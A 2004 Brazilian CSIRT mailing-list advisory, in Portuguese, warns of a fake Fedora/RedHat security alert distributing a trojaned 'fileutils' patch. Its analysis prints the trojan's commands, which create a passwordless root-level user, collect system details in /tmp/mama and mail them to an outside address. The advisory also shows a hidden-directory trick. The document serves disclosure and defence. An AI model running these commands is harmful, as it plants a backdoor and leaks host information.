[SECURITY-L] CAIS-Alerta: Falso alerta do Fedora-RedHat
CSIRT - UNICAMP
security em unicamp.br
Seg Out 25 16:31:01 -03 2004
----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca <cais em cais.rnp.br> -----
From: Centro de Atendimento a Incidentes de Seguranca <cais em cais.rnp.br>
Subject: CAIS-Alerta: Falso alerta do Fedora-RedHat
To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br
Date: Mon, 25 Oct 2004 15:37:51 -0300 (BRST)
-----BEGIN PGP SIGNED MESSAGE-----
Prezados,
O CAIS esta' acompanhando desde ontem a divulgacao de uma mensagem falsa
cujo conteudo tenta se passar por um alerta de seguranca da distribuicao
Fedora.
Tal alerta faz referencia ao site http://fedora-redhat.com/, onde e'
disponibilizada uma falsa correcao, fileutils-1.0.6.patch.tar.gz
(68349c219d941209af8f7c968b89d622).
Este arquivo e' composto dos seguintes arquivos:
990084 Out 23 16:06 fileutils-patch.bin (7d6f449488f8e7360c74101c20e4052c)
14297 Out 23 13:02 inst.c (c6b4e5e288b6ab9ea6157794df811d8f)
32 Out 22 21:59 Makefile (fe6c3513f6f0fa47392e89071ba9cde6)
Analise:
De acordo com as analises realizadas nos arquivos, esta falsa correcao nao
explora nenhuma vulnerabilidade no sistema. Ela depende da acao do usuario
que, ao instalar a suposta correcao como usuario "root", permite que as
acoes descritas abaixo sejam executadas:
. O script "inst.c" deve ser compilado e executado. Ele verifica se o usuario
esta executando como "root";
. Ao ser executado, um usuario chamado "bash" é criado com permissoes de
super-usuario e sem senha;
. O script cria um arquivo chamado /tmp/mama, com o conteudo dos seguintes
comandos:
echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
. E' enviado um e-mail para root em addlebrain.com, com o Subject: "Inca o
roata", com o conteudo do arquivo /tmp/mama
. O script cria o seguinte diretorio:
/tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
. saida da execucao do binario "inst", resultante da compilacao do
codigo-fonte inst.c incluso no pacote:
identifying the system. This may take up to 2 minutes. Please wait ...
./inst: sshd: command not found
System looks OK. Proceeding to next step.
Patching "ls": ###########
Patching "mkdir": ###########
System updated and secured successfuly. You may erase these files.
[root em localhost fileutils-1.0.6.patch]#
Mais informacoes:
. [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
http://lists.netsys.com/pipermail/full-disclosure/2004-October/028031.html
. RedHat.com - Security and Updates
http://www.redhat.com/security
Os alertas enviados pela RedHat tem como origem o endereco de email
secalert em redhat.com e sao assinados digitalmente com uma chave PGP
disponivel no seguinte endereco:
http://www.redhat.com/security/team/key.html
O CAIS recomenda que sempre seja verificada autenticidade de mensagens
enviadas por grupos de seguranca e representantes de empresas. Na maioria
dos casos e' possivel verificar a integridade dos arquivos a serem
instalados.
Os Alertas do CAIS tambem sao oferecidos no formato RSS/RDF:
http://www.rnp.br/cais/alertas/rss.xml
Atenciosamente,
################################################################
# CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA (CAIS) #
# Rede Nacional de Ensino e Pesquisa (RNP) #
# #
# cais em cais.rnp.br http://www.cais.rnp.br #
# Tel. 019-37873300 Fax. 019-37873301 #
# Chave PGP disponivel http://www.rnp.br/cais/cais-pgp.key #
################################################################
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQCVAwUBQX1ICekli63F4U8VAQEsAQP+MZpypjATgjkh6ec5/lnnsIM1KdZS43n/
R2oRI6E4L7w08lcMgUmRQIiV5cDq0xNm3/vRsGxubwN82ZIMjkqHp964aIpEUB14
J+aQ5CZYELyfk5CpfbjVZPsobodgcUJF8AkqdzzqfllKPUQXo8IQ+FlYDKmrqPJN
AkS7CdwHBaI=
=OWs+
-----END PGP SIGNATURE-----
----- End forwarded message -----
Mais detalhes sobre a lista de discussão SECURITY-L